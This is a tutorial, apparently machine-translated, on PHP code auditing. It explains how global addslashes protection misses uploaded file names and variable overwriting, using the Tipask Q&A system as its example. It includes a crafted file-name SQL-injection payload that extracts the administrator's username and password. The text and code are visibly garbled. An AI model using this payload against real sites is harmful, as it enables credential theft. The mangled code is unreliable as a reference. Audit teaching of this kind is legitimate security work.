[PHP code audit] in those years, we will explore SQL injection together-8. Summary of global protection blind spots-php Tutorial

[PHP code audit] in those years, we will explore SQL injection together-8. Summary of global protection blind spots. Part 2: background 0x01

Currently, WEB applications usually defend against SQL injection by checking whether GPC is enabled, and then using the addlashes function to escape special characters such as single quotes. But the use of such protection alone is a lot of blind spots, next to the http://www.waitalone.cn/php-code-audit-6.html, here to introduce the other two cases.

Blind spots:

① FILES injection. only parameters such as GET and POST are escaped globally, and FILES are omitted;

② Override Variables. dangerous functions: extract (), parse_str (), and $.

0x02 vulnerability analysis FILES injection

FILES injection is generally generated by bringing the uploaded name to the insert database during the upload process. for details, refer to the tipask Q & A system.

First, let's take a look at how global protection works:

Index. in php: include TIPASK_ROOT. '/model/tipask. class. php '; $ tipask = new tipask (); $ tipask-> run ();...... follow up to/model/tipask. class. in php: function init_request (){...... $ this-> get = taddslashes ($ this-> get, 1); $ this-> post = taddslashes (array_merge ($ _ GET, $ _ POST )); checkattack ($ this-> post, 'post'); checkattack ($ this-> get, 'Get'); unset ($ _ post );}

We can see that addslashes special escape processing is performed on the data transmitted from get and post, and no processing operation is performed on $ _ FILES. we searched $ _ FILES globally and found/control/attach. php has Upload processing. Follow up:

 "Data/attach/", // save path "fileType" => array (". rar ",". doc ",". docx ",". zip ",". pdf ",". txt ",". swf ",". wmv "," xsl "), // file format" fileSize "=> 10 // file size limit, in MB); // file Upload status, if SUCCESS is returned successfully, the corresponding string $ state = "SUCCESS"; $ clientFile = $ _ FILES ["upfile"]; if (! Isset ($ clientFile) {echo "{'state': 'The file size exceeds the server configuration! ', 'URL': 'null', 'filetype': 'null'} "; // modify php. upload_max_filesize and post_max_sizeexit;} // format verification $ current_type = strtolower (strrchr ($ clientFile ["name"], '. '); if (! In_array ($ current_type, $ config ['filetype']) {$ state = "unsupported file type! ";}// Size verification $ file_size = 1024*1024 * $ config ['filesize']; if ($ clientFile [" size "]> $ file_size) {$ state = "the file size exceeds the limit! ";}// Save the file if ($ state =" SUCCESS ") {$ targetfile = $ config ['uploadpath']. gmdate ('ymm', $ this-> time ). '/'. random (8 ). strrchr ($ clientFile ["name"], '. '); $ result = $ _ ENV ['Attach']-> movetmpfile ($ clientFile, $ targetfile); if (! $ Result) {$ state = "an error occurred while saving the file! ";} Else {// Here, we will bring the uploaded file name to the database for query $ _ ENV ['Attach ']-> add ($ clientFile [" name "], $ current_type, $ clientFile ["size"], $ targetfile, 0) ;}// return the json data echo '{"state": "' to the browser ":"'. $ state. '"," url ":"'. $ targetfile. '"," fileType ":"'. $ current_type. '"," original ":"'. $ clientFile ["name"]. '"}';}

You can see $ _ ENV ['Attach ']-> add ($ clientFile ["name"]…), Add $ clientFile [name] = $ _ FILES ["upfile"] [name] to the following add warehouse operation, resulting in injection.

 base->user['uid'];$this->db->query("INSERT INTO ".DB_TABLEPRE."attach(time,filename,filetype,filesize,location,isimage,uid)  VALUES ({$this->base->time},'$filename','$ftype','$fsize','$location',$isimage,$uid)");return $this->db->insert_id();}

Upload a file and change the file name to the following code to get the administrator account password:

Filename = "1 ','. php', 1, (select concat (username, 0x23, password) from ask_user limit 1digit, 2, 1 digit ).jpg"

The password of the administrator account is successfully inserted into the attach table in the database:

Variable overwrite

There are many extract functions. for example, extract ($ _ POST) will directly retrieve the variables from the POST array and overwrite the previous variables.

     
In the browser, post directly transmits a = 1, and it is found that the value of variable a is successfully overwritten.
    
  
    
At present, the case of Wooyun http://www.wooyun.org/bugs/wooyun-2014-053189 is appear on the overwrite table prefix.
$ Override variables
The principle is actually the same as above. there is a classic $ variable overwrite code:
    
  $_value){$$_key = addslashes($_value);}}echo $a;
    
The test found that the variable a was successfully overwritten.
    
  
    
Case: http://www.wooyun.org/bugs/wooyun-2010-055338
    
Original